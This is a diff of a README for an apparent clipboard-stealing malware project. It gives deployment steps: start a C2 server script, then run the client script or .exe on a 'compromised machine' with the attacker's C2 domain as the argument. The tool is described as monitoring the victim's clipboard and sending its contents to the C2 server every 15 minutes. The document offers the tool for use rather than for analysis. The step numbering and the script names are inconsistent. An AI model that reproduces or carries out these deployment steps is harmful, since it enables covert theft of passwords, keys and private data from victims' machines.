mushahin/ClipboardStealer/README.md

 1. Install the required dependencies as mentioned in prerequisites

+2. On your C2, run c2.py
+Don't forget to set file_path (where you want data to be saved)

-2. Run the program by executing the `client.py` script:
+3. On compromised machine, run the program by executing the `client.py` script:
 `python clipboard_sender.py 'example.com'`

 Where:
 - example.com: Your C2 domain address

-3. If you are using the .exe you can run it by running the following command:
+4. If you are using the .exe you can run it by running the following command:
 `clipboardhost.exe example.com`

 5. Now you're all set! it will continuously monitor the clipboard for changes and send the data in the clipboard to the C2 server every 15 minutes (Depending on the frequency the user updates his clipboard)